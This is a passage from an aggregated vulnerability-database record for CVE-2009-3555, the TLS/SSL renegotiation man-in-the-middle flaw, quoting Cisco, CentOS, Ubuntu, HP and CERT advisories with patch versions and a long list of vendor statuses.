available.\n\nOpenSSL has confirmed this vulnerability in a changelog and released updated software.\n\nTo exploit this vulnerability, the attacker must be able to intercept traffic from a TLS client to a TLS server. In many cases, this may require the attacker to have access to a network that is adjacent to the targeted user's system. Another possibility would be for the attacker to have access to a network that is adjacent to a legitimate TLS server.\n\nThis vulnerability is likely to affect multiple implementations of TLS.", "modified": "2012-08-14T16:24:54", "published": "2009-11-05T19:53:52", "id": "CISCO-SA-20091105-CVE-2009-3555", "href": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/Cisco-SA-20091105-CVE-2009-3555", "type": "cisco", "title": "Transport Layer Security Renegotiation Remote Man-in-the-Middle Attack Vulnerability", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}], "centos": [{"lastseen": "2019-12-20T18:24:56", "bulletinFamily": "unix", "description": "**CentOS Errata and Security Advisory** CESA-2010:0165\n\n\nNetwork Security Services (NSS) is a set of libraries designed to support\nthe cross-platform development of security-enabled client and server\napplications. Applications built with NSS can support SSLv2, SSLv3, TLS,\nand other security standards.\n\nNetscape Portable Runtime (NSPR) provides platform independence for non-GUI\noperating system facilities. These facilities include threads, thread\nsynchronization, normal file and network I/O, interval timing, calendar\ntime, basic memory management (malloc and free), and shared library\nlinking.\n\nA flaw was found in the way the TLS/SSL (Transport Layer Security/Secure\nSockets Layer) protocols handled session renegotiation. A man-in-the-middle\nattacker could use this flaw to prefix arbitrary plain text to a client's\nsession (for example, an HTTPS connection to a website). This could force\nthe server to process an attacker's request as if authenticated using the\nvictim's credentials. This update addresses this flaw by implementing the\nTLS Renegotiation Indication Extension, as defined in RFC 5746.\n(CVE-2009-3555)\n\nRefer to the following Knowledgebase article for additional details about\nthis flaw: http://kbase.redhat.com/faq/docs/DOC-20491\n\nUsers of Red Hat Certificate System 7.3 and 8.0 should review the following\nKnowledgebase article before installing this update:\nhttp://kbase.redhat.com/faq/docs/DOC-28439\n\nAll users of NSS are advised to upgrade to these updated packages, which\nupdate NSS to version 3.12.6. This erratum also updates the NSPR packages\nto the version required by NSS 3.12.6. All running applications using the\nNSS library must be restarted for this update to take effect.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2010-March/028639.html\nhttp://lists.centos.org/pipermail/centos-announce/2010-March/028640.html\nhttp://lists.centos.org/pipermail/centos-announce/2010-March/028645.html\nhttp://lists.centos.org/pipermail/centos-announce/2010-March/028646.html\n\n**Affected packages:**\nnspr\nnspr-devel\nnss\nnss-devel\nnss-pkcs11-devel\nnss-tools\n\n**Upstream details at:**\n\nhttps://rhn.redhat.com/errata/RHSA-2010-0165.html", "modified": "2010-03-28T20:10:58", "published": "2010-03-28T15:36:50", "href": "http://lists.centos.org/pipermail/centos-announce/2010-March/028640.html", "id": "CESA-2010:0165", "title": "nspr, nss security update", "type": "centos", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}], "ubuntu": [{"lastseen": "2019-05-29T17:22:32", "bulletinFamily": "unix", "description": "USN-927-1 fixed vulnerabilities in NSS on Ubuntu 9.10. This update provides the corresponding updates for Ubuntu 9.04.\n\nOriginal advisory details:\n\nMarsh Ray and Steve Dispensa discovered a flaw in the TLS and SSLv3 protocols. If an attacker could perform a man in the middle attack at the start of a TLS connection, the attacker could inject arbitrary content at the beginning of the user\u2019s session. This update adds support for the new new renegotiation extension and will use it when the server supports it.", "modified": "2010-07-23T00:00:00", "published": "2010-07-23T00:00:00", "id": "USN-927-6", "href": "https://usn.ubuntu.com/927-6/", "title": "NSS vulnerability", "type": "ubuntu", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2019-05-29T17:21:36", "bulletinFamily": "unix", "description": "USN-927-1 fixed vulnerabilities in nss in Ubuntu 9.10. This update provides the corresponding updates for Ubuntu 8.04 LTS.\n\nOriginal advisory details:\n\nMarsh Ray and Steve Dispensa discovered a flaw in the TLS and SSLv3 protocols. If an attacker could perform a man in the middle attack at the start of a TLS connection, the attacker could inject arbitrary content at the beginning of the user\u2019s session. This update adds support for the new new renegotiation extension and will use it when the server supports it.", "modified": "2010-06-29T00:00:00", "published": "2010-06-29T00:00:00", "id": "USN-927-4", "href": "https://usn.ubuntu.com/927-4/", "title": "nss vulnerability", "type": "ubuntu", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}], "cert": [{"lastseen": "2019-10-09T19:50:15", "bulletinFamily": "info", "description": "### Overview \n\nA vulnerability exists in SSL and TLS protocols that may allow attackers to execute an arbitrary HTTP transaction.\n\n### Description \n\nThe Secure Sockets Layer (SSL) and Transport Layer Security (TLS) protocols are commonly used to provide authentication, encryption, integrity, and non-repudiation services to network applications such as HTTP, IMAP, POP3, LDAP. A vulnerability in the way SSL and TLS protocols allow renegotiation requests may allow an attacker to inject plaintext into an application protocol stream. This could result in a situation where the attacker may be able to issue commands to the server that appear to be coming from a legitimate source. According to the [Network Working Group](<https://svn.resiprocate.org/rep/ietf-drafts/ekr/draft-rescorla-tls-renegotiate.txt>):\n\n_The server treats the client's initial TLS handshake as a renegotiation and thus believes that the initial data transmitted by the attacker is from the same entity as the subsequent client data._ \n \nThis issue affects SSL version 3.0 and newer and TLS version 1.0 and newer. \n \n--- \n \n### Impact \n\nA remote, unauthenticated attacker may be able to inject an arbitrary amount of chosen plaintext into the beginning of the application protocol stream. This could allow and attacker to issue HTTP requests, or take action impersonating the user, among other consequences. \n \n--- \n \n### Solution \n\nUsers should contact vendors for specific patch information. \n \n--- \n \n### Vendor Information\n\n120541\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Vendor has issued information\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n__ Affected __ Unknown __ Unaffected \n\n**Javascript is disabled. Click here to view vendors.**\n\n### __ __ Barracuda Networks\n\nNotified: November 05, 2009 Updated: December 17, 2009 \n\n**Statement Date: December 04, 2009**\n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nBarracuda Networks has published a response to this issue at the following location:\n\n<<http://www.barracudanetworks.com/ns/support/tech_alert.php>> \nPlease refer to the section titled \"Resolved vulnerability in the TLS/SSL protocol during session renegotiation in select Barracuda Networks products\" for more information.\n\n### __ Debian GNU/Linux\n\nNotified: November 05, 2009 Updated: November 11, 2009 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### __ GnuTLS\n\nNotified: November 05, 2009 Updated: November 11, 2009 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### __ __ Hewlett-Packard Company\n\nNotified: November 05, 2009 Updated: December 17, 2009 \n\n**Statement Date: December 15, 2009**\n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\n`-----BEGIN PGP SIGNED MESSAGE-----` \n`Hash: SHA1` \n \n`SUPPORT COMMUNICATION - SECURITY BULLETIN` \n \n`Document ID: c01945686` \n`Version: 2` \n \n`HPSBUX02482 SSRT090249 rev.2 - HP-UX Running OpenSSL, Remote Unauthorized Data Injection, Denial of Service (DoS)` \n \n`NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.` \n \n`Release Date: 2009-11-25` \n`Last Updated: 2009-12-12` \n \n`Potential Security Impact: Remote unauthorized data injection, Denial of Service (DoS)` \n \n`Source: Hewlett-Packard Company, HP Software Security Response Team` \n \n`VULNERABILITY SUMMARY` \n`A potential security vulnerability has been identified with HP-UX OpenSSL. The vulnerability could be exploited remotely to inject unauthorized data or to create a Denial of Service (DoS).` \n \n`References: CVE-2009-3555` \n \n`SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.` \n`HP-UX B.11.11, B.11.23, B.11.31 running OpenSSL before vA.00.09.08l.` \n \n`BACKGROUND` \n \n`CVSS 2.0 Base Metrics` \n`===========================================================` \n` Reference Base Vector Base Score` \n`CVE-2009-3555 (AV:N/AC:L/Au:N/C:N/I:P/A:P) 6.4` \n`===========================================================` \n` Information on CVSS is documented` \n` in HP Customer Notice: HPSN-2008-002` \n \n`RESOLUTION` \n \n`HP has provided upgrades to resolve this vulnerability.` \n`The upgrades are available from the following location.` \n \n`<http://software.hp.com>` \n \n`HP-UX Release` \n` Version of OpenSSL Depot` \n \n`B.11.11 PA (32 and 64)` \n` A.00.09.08l.001` \n \n`B.11.23 (PA and IA)` \n` A.00.09.08l.002` \n \n`B.11.31 (PA and IA)` \n` A.00.09.08l.003` \n \n`Note: OpenSSL vA.00.09.08l disables renegotiation. Although renegotiation is thought to be rarely used, applications should be tested to evaluate the impact of installing OpenSSL vA.00.09.08l.` \n \n`MANUAL ACTIONS: Yes - Update` \n \n`Install OpenSSL A.00.09.08l or subsequent` \n \n`PRODUCT SPECIFIC INFORMATION` \n \n`HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application that replaces HP-UX Security Patch Check. It analyzes all Security Bulletins issued by HP and lists recommended actions that may apply to a specific HP-UX system. It can also download patches and create a depot automatically. For more information see: <https://www.hp.com/go/swa>` \n \n`The following text is for use by the HP-UX Software Assistant.` \n \n`AFFECTED VERSIONS` \n \n`HP-UX B.11.11` \n`==================` \n`openssl.OPENSSL-CER` \n`openssl.OPENSSL-CONF` \n`openssl.OPENSSL-DOC` \n`openssl.OPENSSL-INC` \n`openssl.OPENSSL-LIB` \n`openssl.OPENSSL-MAN` \n`openssl.OPENSSL-MIS` \n`openssl.OPENSSL-PRNG` \n`openssl.OPENSSL-PVT` \n`openssl.OPENSSL-RUN` \n`openssl.OPENSSL-SRC` \n`action: install revision A.00.09.08l.001 or subsequent` \n \n`HP-UX B.11.23` \n`==================` \n`openssl.OPENSSL-CER` \n`openssl.OPENSSL-CONF` \n`openssl.OPENSSL-DOC` \n`openssl.OPENSSL-INC` \n`openssl.OPENSSL-LIB` \n`openssl.OPENSSL-MAN` \n`openssl.OPENSSL-MIS` \n`openssl.OPENSSL-PRNG` \n`openssl.OPENSSL-PVT` \n`openssl.OPENSSL-RUN` \n`openssl.OPENSSL-SRC` \n`action: install revision A.00.09.08l.002 or subsequent` \n \n`HP-UX B.11.31` \n`==================` \n`openssl.OPENSSL-CER` \n`openssl.OPENSSL-CONF` \n`openssl.OPENSSL-DOC` \n`openssl.OPENSSL-INC` \n`openssl.OPENSSL-LIB` \n`openssl.OPENSSL-MAN` \n`openssl.OPENSSL-MIS` \n`openssl.OPENSSL-PRNG` \n`openssl.OPENSSL-PVT` \n`openssl.OPENSSL-RUN` \n`openssl.OPENSSL-SRC` \n`action: install revision A.00.09.08l.003 or subsequent` \n \n`END AFFECTED VERSIONS` \n \n`HISTORY` \n`Version:1 (rev.1) 25 November 2009 Initial release` \n`Version:2 (rev.2) 14 December 2009 Revised location from which to download upgrades, fileset content.` \n`Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy.` \n \n`Support: For further information, contact normal HP Services support channel.` \n \n`Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com` \n`It is strongly recommended that security related information being communicated to HP be encrypted using PGP, especially exploit information.` \n`To get the security-alert PGP key, please send an e-mail message as follows:` \n` To: security-alert@hp.com` \n` Subject: get key` \n`Subscribe: To initiate a subscription to receive future HP Security Bulletins via Email:` \n`[http://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA&langcode=USENG&jumpid=in_SC-GEN__driverITRC&topiccode=ITRC](<http://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA&langcode=USENG&jumpid=in_SC-GEN__driverITRC&topiccode=ITRC>)` \n`On the web page: ITRC security bulletins and patch sign-up` \n`Under Step1: your ITRC security bulletins and patches` \n` -check ALL categories for which alerts are required and continue.` \n`Under Step2: your ITRC operating systems` \n` -verify your operating system selections are checked and save.` \n \n`To update an existing subscription: <http://h30046.www3.hp.com/subSignIn.php>` \n`Log in on the web page: Subscriber's choice for Business: sign-in.` \n`On the web page: Subscriber's Choice: your profile summary - use Edit Profile to update appropriate sections.` \n \n`To review previously published Security Bulletins visit: <http://www.itrc.hp.com/service/cki/secBullArchive.do>` \n \n`* The Software Product Category that this Security Bulletin` \n`relates to is represented by the 5th and 6th characters` \n`of the Bulletin number in the title:` \n \n`GN = HP General SW` \n`MA = HP Management Agents` \n`MI = Misc. 3rd Party SW` \n`MP = HP MPE/iX` \n`NS = HP NonStop Servers` \n`OV = HP OpenVMS` \n`PI = HP Printing & Imaging` \n`ST = HP Storage SW` \n`TL = HP Trusted Linux` \n`TU = HP Tru64 UNIX` \n`UX = HP-UX` \n`VV = HP VirtualVault` \n \n`System management and security procedures must be reviewed frequently to maintain system integrity. HP is continually reviewing and enhancing the security features of software products to provide customers with current secure solutions.` \n \n`\"HP is broadly distributing this Security Bulletin in order to bring to the attention of users of the affected HP products the important security information contained in this Bulletin. HP recommends that all users determine the applicability of this information to their individual situations and take appropriate action. HP does not warrant that this information is necessarily accurate or complete for all user situations and, consequently, HP will not be responsible for any damages resulting from user's use or disregard of the information provided in this Bulletin. To the extent permitted by law, HP disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose, title and non-infringement.\"` \n \n`Copyright 2009 Hewlett-Packard Development Company, L.P.` \n`Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided \"as is\" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits;damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners.` \n`-----BEGIN PGP SIGNATURE-----` \n`Version: GnuPG v1.4.10 (GNU/Linux)` \n \n`iEYEARECAAYFAksmnlAACgkQ4B86/C0qfVkacACgpkVOgFipzlbxSDrmY0HLegCd` \n`8C8AoMKw23iAcTZCMkeMIM1QmTAyujeA` \n`=KK6o` \n`-----END PGP SIGNATURE-----`\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### __ IBM Corporation\n\nNotified: November 05, 2009 Updated: November 11, 2009 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### __ McAfee\n\nNotified: November 05, 2009 Updated: November 11, 2009 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### __ __ Sun Microsystems, Inc.\n\nNotified: November 05, 2009 Updated: November 06, 2009 \n\n**Statement Date: November 05, 2009**\n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nSun Microsystems has published a preliminary statement about this issue in the following Sun Security Blog post:\n\n \n<<http://blogs.sun.com/security/entry/vulnerability_in_tls_protocol_during>>\n\n### Vendor References\n\nNone\n\n### Addendum\n\nThere are no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23120541 Feedback>).\n\n### __ __ Cryptlib\n\nNotified: November 05, 2009 Updated: November 11, 2009 \n\n**Statement Date: November 10, 2009**\n\n### Status\n\n__ Not Vulnerable\n\n### Vendor Statement\n\ncryptlib does not allow renegotiation, it ignores requests to renegotiate as provided for in the TLS specification. It is therefore not vulnerable to this issue.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### __ Force10 Networks, Inc.\n\nNotified: November 05, 2009 Updated: July 22, 2011 \n\n### Status\n\n__ Not Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ Redback Networks, Inc.\n\nNotified: November 05, 2009 Updated: November 11, 2009 \n\n### Status\n\n__ Not Vulnerable\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### __ __ SafeNet\n\nNotified: November 05, 2009 Updated: November 19, 2009 \n\n### Status\n\n__ Not Vulnerable\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nAccording to SafeNet their products that make use of SSL/TLS use it with proprietary messaging protocols that set up the authenticated session at the beginning of the transmission and do not allow the sort of requested Renegotiate that makes this vulnerability exploitable.\n\n### __ libgcrypt\n\nNotified: November 05, 2009 Updated: November 11, 2009 \n\n### Status\n\n__ Not Vulnerable\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### __ 3com Inc\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ ACCESS\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ AT&T\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ Alcatel-Lucent\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ Apache HTTP Server Project\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ Apache-SSL\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ Apple Inc.\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ Aruba Networks, Inc.\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ Attachmate\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ Avaya, Inc.\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ Belkin, Inc.\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ Borderware Technologies\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ Certicom\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ Charlotte's Web Networks\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ Check Point Software Technologies\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ Cisco Systems, Inc.\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ Clavister\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ Computer Associates\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ Conectiva Inc.\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ Cray Inc.\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ Crypto++ Library\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ D-Link Systems, Inc.\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ DragonFly BSD Project\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ EMC Corporation\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ Engarde Secure Linux\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ Enterasys Networks\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ Ericsson\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ Extreme Networks\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ F5 Networks, Inc.\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ Fedora Project\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ Fortinet, Inc.\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ Foundry Networks, Inc.\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ FreeBSD Project\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ Fujitsu\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ Gentoo Linux\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ Global Technology Associates, Inc.\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ Hitachi\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ IBM eServer\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ IP Filter\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ IP Infusion, Inc.\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ Infoblox\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ Intel Corporation\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ Internet Security Systems, Inc.\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ Intoto\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ Juniper Networks, Inc.\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ Lotus Software\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ Luminous Networks\n\nNotified: November 05, 2009 Updated: November 05, 2009 